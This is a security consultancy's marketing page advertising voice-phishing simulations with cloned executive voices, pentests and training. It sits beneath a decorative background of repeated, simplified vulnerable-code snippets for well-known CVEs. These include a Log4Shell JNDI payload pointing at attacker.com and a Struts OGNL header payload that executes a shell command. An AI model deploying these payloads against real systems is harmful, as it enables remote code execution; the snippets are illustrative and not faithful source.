1/* CVE-2014-0160 — Heartbleed */ /* CVE-2014-0160 — Heartbleed */ /* CVE-2014-0160 — Heartbleed */ /* CVE-2014-0160 — Heartbleed */ /* CVE-2014-0160 — Heartbleed */ /* CVE-2014-0160 — Heartbleed */ /* CVE-2014-0160 — Heartbleed */ /* CVE-2014-0160 — Heartbleed */
2int dtls1_process_heartbeat(SSL *s) { int dtls1_process_heartbeat(SSL *s) { int dtls1_process_heartbeat(SSL *s) { int dtls1_process_heartbeat(SSL *s) { int dtls1_process_heartbeat(SSL *s) { int dtls1_process_heartbeat(SSL *s) { int dtls1_process_heartbeat(SSL *s) { int dtls1_process_heartbeat(SSL *s) {
3 unsigned char *p = &s->s3->rrec.data[0], *pl; unsigned char *p = &s->s3->rrec.data[0], *pl; unsigned char *p = &s->s3->rrec.data[0], *pl; unsigned char *p = &s->s3->rrec.data[0], *pl; unsigned char *p = &s->s3->rrec.data[0], *pl; unsigned char *p = &s->s3->rrec.data[0], *pl; unsigned char *p = &s->s3->rrec.data[0], *pl; unsigned char *p = &s->s3->rrec.data[0], *pl;
4 unsigned short hbtype; unsigned short hbtype; unsigned short hbtype; unsigned short hbtype; unsigned short hbtype; unsigned short hbtype; unsigned short hbtype; unsigned short hbtype;
5 unsigned int payload; unsigned int payload; unsigned int payload; unsigned int payload; unsigned int payload; unsigned int payload; unsigned int payload; unsigned int payload;
6 hbtype = *p++; hbtype = *p++; hbtype = *p++; hbtype = *p++; hbtype = *p++; hbtype = *p++; hbtype = *p++; hbtype = *p++;
7 n2s(p, payload); n2s(p, payload); n2s(p, payload); n2s(p, payload); n2s(p, payload); n2s(p, payload); n2s(p, payload); n2s(p, payload);
8 pl = p; pl = p; pl = p; pl = p; pl = p; pl = p; pl = p; pl = p;
9 // BUG: no bounds check on payload length // BUG: no bounds check on payload length // BUG: no bounds check on payload length // BUG: no bounds check on payload length // BUG: no bounds check on payload length // BUG: no bounds check on payload length // BUG: no bounds check on payload length // BUG: no bounds check on payload length
10 memcpy(bp, pl, payload); memcpy(bp, pl, payload); memcpy(bp, pl, payload); memcpy(bp, pl, payload); memcpy(bp, pl, payload); memcpy(bp, pl, payload); memcpy(bp, pl, payload); memcpy(bp, pl, payload);
11 // attacker reads up to 64KB of server memory // attacker reads up to 64KB of server memory // attacker reads up to 64KB of server memory // attacker reads up to 64KB of server memory // attacker reads up to 64KB of server memory // attacker reads up to 64KB of server memory // attacker reads up to 64KB of server memory // attacker reads up to 64KB of server memory
12 return 0; return 0; return 0; return 0; return 0; return 0; return 0; return 0;
13} } } } } } } }
14
15/* CVE-2014-6271 — Shellshock */ /* CVE-2014-6271 — Shellshock */ /* CVE-2014-6271 — Shellshock */ /* CVE-2014-6271 — Shellshock */ /* CVE-2014-6271 — Shellshock */ /* CVE-2014-6271 — Shellshock */ /* CVE-2014-6271 — Shellshock */ /* CVE-2014-6271 — Shellshock */
16env x='() { :;}; echo vulnerable' bash -c "echo test" env x='() { :;}; echo vulnerable' bash -c "echo test" env x='() { :;}; echo vulnerable' bash -c "echo test" env x='() { :;}; echo vulnerable' bash -c "echo test" env x='() { :;}; echo vulnerable' bash -c "echo test" env x='() { :;}; echo vulnerable' bash -c "echo test" env x='() { :;}; echo vulnerable' bash -c "echo test" env x='() { :;}; echo vulnerable' bash -c "echo test"
17// Bash parses function definitions in environment // Bash parses function definitions in environment // Bash parses function definitions in environment // Bash parses function definitions in environment // Bash parses function definitions in environment // Bash parses function definitions in environment // Bash parses function definitions in environment // Bash parses function definitions in environment
18// variables but continues executing trailing commands // variables but continues executing trailing commands // variables but continues executing trailing commands // variables but continues executing trailing commands // variables but continues executing trailing commands // variables but continues executing trailing commands // variables but continues executing trailing commands // variables but continues executing trailing commands
19parse_and_execute(string, name, SEVAL_NONINT); parse_and_execute(string, name, SEVAL_NONINT); parse_and_execute(string, name, SEVAL_NONINT); parse_and_execute(string, name, SEVAL_NONINT); parse_and_execute(string, name, SEVAL_NONINT); parse_and_execute(string, name, SEVAL_NONINT); parse_and_execute(string, name, SEVAL_NONINT); parse_and_execute(string, name, SEVAL_NONINT);
20// allows remote code execution via CGI, SSH, DHCP // allows remote code execution via CGI, SSH, DHCP // allows remote code execution via CGI, SSH, DHCP // allows remote code execution via CGI, SSH, DHCP // allows remote code execution via CGI, SSH, DHCP // allows remote code execution via CGI, SSH, DHCP // allows remote code execution via CGI, SSH, DHCP // allows remote code execution via CGI, SSH, DHCP
21if (assignment_acceptable(last_command_exit_value)) if (assignment_acceptable(last_command_exit_value)) if (assignment_acceptable(last_command_exit_value)) if (assignment_acceptable(last_command_exit_value)) if (assignment_acceptable(last_command_exit_value)) if (assignment_acceptable(last_command_exit_value)) if (assignment_acceptable(last_command_exit_value)) if (assignment_acceptable(last_command_exit_value))
22 command = parse_command(); command = parse_command(); command = parse_command(); command = parse_command(); command = parse_command(); command = parse_command(); command = parse_command(); command = parse_command();
23
24/* CVE-2021-44228 — Log4Shell */ /* CVE-2021-44228 — Log4Shell */ /* CVE-2021-44228 — Log4Shell */ /* CVE-2021-44228 — Log4Shell */ /* CVE-2021-44228 — Log4Shell */ /* CVE-2021-44228 — Log4Shell */ /* CVE-2021-44228 — Log4Shell */ /* CVE-2021-44228 — Log4Shell */
25public class JndiLookup implements StrLookup { public class JndiLookup implements StrLookup { public class JndiLookup implements StrLookup { public class JndiLookup implements StrLookup { public class JndiLookup implements StrLookup { public class JndiLookup implements StrLookup { public class JndiLookup implements StrLookup { public class JndiLookup implements StrLookup {
26 public String lookup(LogEvent event, String key) { public String lookup(LogEvent event, String key) { public String lookup(LogEvent event, String key) { public String lookup(LogEvent event, String key) { public String lookup(LogEvent event, String key) { public String lookup(LogEvent event, String key) { public String lookup(LogEvent event, String key) { public String lookup(LogEvent event, String key) {
27 // BUG: user input passed directly to JNDI lookup // BUG: user input passed directly to JNDI lookup // BUG: user input passed directly to JNDI lookup // BUG: user input passed directly to JNDI lookup // BUG: user input passed directly to JNDI lookup // BUG: user input passed directly to JNDI lookup // BUG: user input passed directly to JNDI lookup // BUG: user input passed directly to JNDI lookup
28 return Objects.toString( return Objects.toString( return Objects.toString( return Objects.toString( return Objects.toString( return Objects.toString( return Objects.toString( return Objects.toString(
29 JndiManager.getDefaultManager().lookup(key), key JndiManager.getDefaultManager().lookup(key), key JndiManager.getDefaultManager().lookup(key), key JndiManager.getDefaultManager().lookup(key), key JndiManager.getDefaultManager().lookup(key), key JndiManager.getDefaultManager().lookup(key), key JndiManager.getDefaultManager().lookup(key), key JndiManager.getDefaultManager().lookup(key), key
30 ); ); ); ); ); ); ); );
31 } } } } } } } }
32} } } } } } } }
33// payload: ${jndi:ldap://attacker.com/exploit} // payload: ${jndi:ldap://attacker.com/exploit} // payload: ${jndi:ldap://attacker.com/exploit} // payload: ${jndi:ldap://attacker.com/exploit} // payload: ${jndi:ldap://attacker.com/exploit} // payload: ${jndi:ldap://attacker.com/exploit} // payload: ${jndi:ldap://attacker.com/exploit} // payload: ${jndi:ldap://attacker.com/exploit}
34// triggers remote class loading via crafted log message // triggers remote class loading via crafted log message // triggers remote class loading via crafted log message // triggers remote class loading via crafted log message // triggers remote class loading via crafted log message // triggers remote class loading via crafted log message // triggers remote class loading via crafted log message // triggers remote class loading via crafted log message
35logger.info("User-Agent: " + request.getHeader("User-Agent")); logger.info("User-Agent: " + request.getHeader("User-Agent")); logger.info("User-Agent: " + request.getHeader("User-Agent")); logger.info("User-Agent: " + request.getHeader("User-Agent")); logger.info("User-Agent: " + request.getHeader("User-Agent")); logger.info("User-Agent: " + request.getHeader("User-Agent")); logger.info("User-Agent: " + request.getHeader("User-Agent")); logger.info("User-Agent: " + request.getHeader("User-Agent"));
36
37/* CVE-2017-5638 — Apache Struts RCE */ /* CVE-2017-5638 — Apache Struts RCE */ /* CVE-2017-5638 — Apache Struts RCE */ /* CVE-2017-5638 — Apache Struts RCE */ /* CVE-2017-5638 — Apache Struts RCE */ /* CVE-2017-5638 — Apache Struts RCE */ /* CVE-2017-5638 — Apache Struts RCE */ /* CVE-2017-5638 — Apache Struts RCE */
38Content-Type: %{(#_='multipart/form-data'). Content-Type: %{(#_='multipart/form-data'). Content-Type: %{(#_='multipart/form-data'). Content-Type: %{(#_='multipart/form-data'). Content-Type: %{(#_='multipart/form-data'). Content-Type: %{(#_='multipart/form-data'). Content-Type: %{(#_='multipart/form-data'). Content-Type: %{(#_='multipart/form-data').
39 (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
40 (#_memberAccess?(#_memberAccess=#dm): (#_memberAccess?(#_memberAccess=#dm): (#_memberAccess?(#_memberAccess=#dm): (#_memberAccess?(#_memberAccess=#dm): (#_memberAccess?(#_memberAccess=#dm): (#_memberAccess?(#_memberAccess=#dm): (#_memberAccess?(#_memberAccess=#dm): (#_memberAccess?(#_memberAccess=#dm):
41 (#container=#context['com.opensymphony.xwork2 (#container=#context['com.opensymphony.xwork2 (#container=#context['com.opensymphony.xwork2 (#container=#context['com.opensymphony.xwork2 (#container=#context['com.opensymphony.xwork2 (#container=#context['com.opensymphony.xwork2 (#container=#context['com.opensymphony.xwork2 (#container=#context['com.opensymphony.xwork2
42 .ActionContext.container'])). .ActionContext.container'])). .ActionContext.container'])). .ActionContext.container'])). .ActionContext.container'])). .ActionContext.container'])). .ActionContext.container'])). .ActionContext.container'])).
43 (#cmd='whoami').(#iswin=(@java.lang.System (#cmd='whoami').(#iswin=(@java.lang.System (#cmd='whoami').(#iswin=(@java.lang.System (#cmd='whoami').(#iswin=(@java.lang.System (#cmd='whoami').(#iswin=(@java.lang.System (#cmd='whoami').(#iswin=(@java.lang.System (#cmd='whoami').(#iswin=(@java.lang.System (#cmd='whoami').(#iswin=(@java.lang.System
44 @getProperty('os.name').toLowerCase() @getProperty('os.name').toLowerCase() @getProperty('os.name').toLowerCase() @getProperty('os.name').toLowerCase() @getProperty('os.name').toLowerCase() @getProperty('os.name').toLowerCase() @getProperty('os.name').toLowerCase() @getProperty('os.name').toLowerCase()
45 .contains('win'))).(#cmds=(#iswin? .contains('win'))).(#cmds=(#iswin? .contains('win'))).(#cmds=(#iswin? .contains('win'))).(#cmds=(#iswin? .contains('win'))).(#cmds=(#iswin? .contains('win'))).(#cmds=(#iswin? .contains('win'))).(#cmds=(#iswin? .contains('win'))).(#cmds=(#iswin?
46 {'cmd','/c',#cmd}:{'/bin/sh','-c',#cmd})) {'cmd','/c',#cmd}:{'/bin/sh','-c',#cmd})) {'cmd','/c',#cmd}:{'/bin/sh','-c',#cmd})) {'cmd','/c',#cmd}:{'/bin/sh','-c',#cmd})) {'cmd','/c',#cmd}:{'/bin/sh','-c',#cmd})) {'cmd','/c',#cmd}:{'/bin/sh','-c',#cmd})) {'cmd','/c',#cmd}:{'/bin/sh','-c',#cmd})) {'cmd','/c',#cmd}:{'/bin/sh','-c',#cmd}))
47
48/* CVE-2019-0708 — BlueKeep */ /* CVE-2019-0708 — BlueKeep */ /* CVE-2019-0708 — BlueKeep */ /* CVE-2019-0708 — BlueKeep */ /* CVE-2019-0708 — BlueKeep */ /* CVE-2019-0708 — BlueKeep */ /* CVE-2019-0708 — BlueKeep */ /* CVE-2019-0708 — BlueKeep */
49BOOL rdp_parse_server_settings(rdpRdp* rdp, BOOL rdp_parse_server_settings(rdpRdp* rdp, BOOL rdp_parse_server_settings(rdpRdp* rdp, BOOL rdp_parse_server_settings(rdpRdp* rdp, BOOL rdp_parse_server_settings(rdpRdp* rdp, BOOL rdp_parse_server_settings(rdpRdp* rdp, BOOL rdp_parse_server_settings(rdpRdp* rdp, BOOL rdp_parse_server_settings(rdpRdp* rdp,
50 STREAM* s, UINT16 length) { STREAM* s, UINT16 length) { STREAM* s, UINT16 length) { STREAM* s, UINT16 length) { STREAM* s, UINT16 length) { STREAM* s, UINT16 length) { STREAM* s, UINT16 length) { STREAM* s, UINT16 length) {
51 // Use-after-free in RDP channel handling // Use-after-free in RDP channel handling // Use-after-free in RDP channel handling // Use-after-free in RDP channel handling // Use-after-free in RDP channel handling // Use-after-free in RDP channel handling // Use-after-free in RDP channel handling // Use-after-free in RDP channel handling
52 if (channelCount > 0) { if (channelCount > 0) { if (channelCount > 0) { if (channelCount > 0) { if (channelCount > 0) { if (channelCount > 0) { if (channelCount > 0) { if (channelCount > 0) {
53 channelDefArray = malloc(channelCount * channelDefArray = malloc(channelCount * channelDefArray = malloc(channelCount * channelDefArray = malloc(channelCount * channelDefArray = malloc(channelCount * channelDefArray = malloc(channelCount * channelDefArray = malloc(channelCount * channelDefArray = malloc(channelCount *
54 sizeof(CHANNEL_DEF)); sizeof(CHANNEL_DEF)); sizeof(CHANNEL_DEF)); sizeof(CHANNEL_DEF)); sizeof(CHANNEL_DEF)); sizeof(CHANNEL_DEF)); sizeof(CHANNEL_DEF)); sizeof(CHANNEL_DEF));
55 // BUG: freed memory later dereferenced // BUG: freed memory later dereferenced // BUG: freed memory later dereferenced // BUG: freed memory later dereferenced // BUG: freed memory later dereferenced // BUG: freed memory later dereferenced // BUG: freed memory later dereferenced // BUG: freed memory later dereferenced
56 free(channelDefArray); free(channelDefArray); free(channelDefArray); free(channelDefArray); free(channelDefArray); free(channelDefArray); free(channelDefArray); free(channelDefArray);
57 channelDefArray[i].name = channelName; channelDefArray[i].name = channelName; channelDefArray[i].name = channelName; channelDefArray[i].name = channelName; channelDefArray[i].name = channelName; channelDefArray[i].name = channelName; channelDefArray[i].name = channelName; channelDefArray[i].name = channelName;
58 } } } } } } } }
59} } } } } } } }
60/* CVE-2014-0160 — Heartbleed */ /* CVE-2014-0160 — Heartbleed */ /* CVE-2014-0160 — Heartbleed */ /* CVE-2014-0160 — Heartbleed */ /* CVE-2014-0160 — Heartbleed */ /* CVE-2014-0160 — Heartbleed */ /* CVE-2014-0160 — Heartbleed */ /* CVE-2014-0160 — Heartbleed */
61int dtls1_process_heartbeat(SSL *s) { int dtls1_process_heartbeat(SSL *s) { int dtls1_process_heartbeat(SSL *s) { int dtls1_process_heartbeat(SSL *s) { int dtls1_process_heartbeat(SSL *s) { int dtls1_process_heartbeat(SSL *s) { int dtls1_process_heartbeat(SSL *s) { int dtls1_process_heartbeat(SSL *s) {
62 unsigned char *p = &s->s3->rrec.data[0], *pl; unsigned char *p = &s->s3->rrec.data[0], *pl; unsigned char *p = &s->s3->rrec.data[0], *pl; unsigned char *p = &s->s3->rrec.data[0], *pl; unsigned char *p = &s->s3->rrec.data[0], *pl; unsigned char *p = &s->s3->rrec.data[0], *pl; unsigned char *p = &s->s3->rrec.data[0], *pl; unsigned char *p = &s->s3->rrec.data[0], *pl;
63 unsigned short hbtype; unsigned short hbtype; unsigned short hbtype; unsigned short hbtype; unsigned short hbtype; unsigned short hbtype; unsigned short hbtype; unsigned short hbtype;
64 unsigned int payload; unsigned int payload; unsigned int payload; unsigned int payload; unsigned int payload; unsigned int payload; unsigned int payload; unsigned int payload;
65 hbtype = *p++; hbtype = *p++; hbtype = *p++; hbtype = *p++; hbtype = *p++; hbtype = *p++; hbtype = *p++; hbtype = *p++;
66 n2s(p, payload); n2s(p, payload); n2s(p, payload); n2s(p, payload); n2s(p, payload); n2s(p, payload); n2s(p, payload); n2s(p, payload);
67 pl = p; pl = p; pl = p; pl = p; pl = p; pl = p; pl = p; pl = p;
68 // BUG: no bounds check on payload length // BUG: no bounds check on payload length // BUG: no bounds check on payload length // BUG: no bounds check on payload length // BUG: no bounds check on payload length // BUG: no bounds check on payload length // BUG: no bounds check on payload length // BUG: no bounds check on payload length
69 memcpy(bp, pl, payload); memcpy(bp, pl, payload); memcpy(bp, pl, payload); memcpy(bp, pl, payload); memcpy(bp, pl, payload); memcpy(bp, pl, payload); memcpy(bp, pl, payload); memcpy(bp, pl, payload);
70 // attacker reads up to 64KB of server memory // attacker reads up to 64KB of server memory // attacker reads up to 64KB of server memory // attacker reads up to 64KB of server memory // attacker reads up to 64KB of server memory // attacker reads up to 64KB of server memory // attacker reads up to 64KB of server memory // attacker reads up to 64KB of server memory
Security.Rocks
Making security accessible.
Your team learns to recognize real attacks by experiencing them firsthand. Built by ethical hackers.
Scroll
There are plenty of technical measures. But people remain the weakest link.
Everyone is tired of phishing simulations. E-learnings get clicked away. Meanwhile, attacks are getting more personal: AI-generated voices, targeted social engineering, and deepfakes.
Your employees are increasingly targeted in their private lives. Data breaches expose personal information, which criminals combine with public data from LinkedIn. A targeted attack on someone's personal email or phone falls outside all your technical measures. And often serves as a stepping stone into your corporate environment.
You won't solve that with a PowerPoint. It requires something that truly sticks.
Voice phishing simulation
More about the Scam Phonearrow_forward
Your colleagues hear the CEO's voice, and are asked to make a transfer.
The Scam Phone simulates real voice phishing in the workplace. No screen, no e-learning. A phone that rings, a familiar voice, and a request that's just believable enough.
01
record_voice_over
Load voices
We load the voice of your CEO, CFO, or IT manager onto the phone. Ready within a day.
02
power
Plug it in
The phone arrives by post. Set it down, plug it in, done. No IT connection needed.
03
groups
Experience it
Employees pick up and hear a familiar voice with a suspicious request. That's what they'll talk about.
assessment
Report for your board
Afterwards, you receive an awareness report: how many people picked up, how many conversations took place, and how many completed the full scenario. Ready to present to your board.
verified
If they don't talk about it, you don't pay.
That's our guarantee. We've never had to honor it.
format_quote
“Outstanding results within a short timeframe. A comprehensive report with clear examples and CVSS scores. Communication and flexibility were top-notch.”
Sander van de VenCISO
From awareness to pentest. Always from the attacker's perspective.
Every service is built on the same foundation: we know how attacks work, because we carry them out ourselves.
Escape Room
A mobile escape room at your location. Your team solves cybersecurity puzzles, an ethical hacker does the debrief.
Training
From custom awareness to Security by Design for developers. Hands-on, with real scenarios.
biotech
Penetration Testing
The same hackers who train your people also test your systems. Fixed price, no surprises, free retest.
Track record
10 years, 150+ pentests, and more vulnerabilities found than cups of coffee we've had.
Experience
10+
Years in offensive security
Certified
OSCP
100% certified team
Track record
150+
Penetration tests performed
Fixed price
€0
In unexpected invoices
What we're proud of
Dutch COVID Tracer App
Critical vulnerabilities found in all prototypes. The ministry switched entirely to a new, more secure design.
King's Day Live
Threat model and security for the platform that hosted the Royal Family's livestream. Zero incidents.
SAP Security Researcher
Vulnerability found in SAP login functionality. Recognized as SAP Acknowledged Security Researcher.
VNG Hall of Fame
Vulnerability reported to the municipality of Utrecht. Inducted into the Hall of Fame of the Association of Dutch Municipalities.
Free
You don't spot real phishing by spelling mistakes.
Every month we break down a real phishing attack into a poster you can hang by the coffee machine. So your team learns to look at context, not typos.
Eén mail per maand, geen spam. Je kunt je altijd uitschrijven.
Curious how your colleagues will react?
Get in touch, no obligations.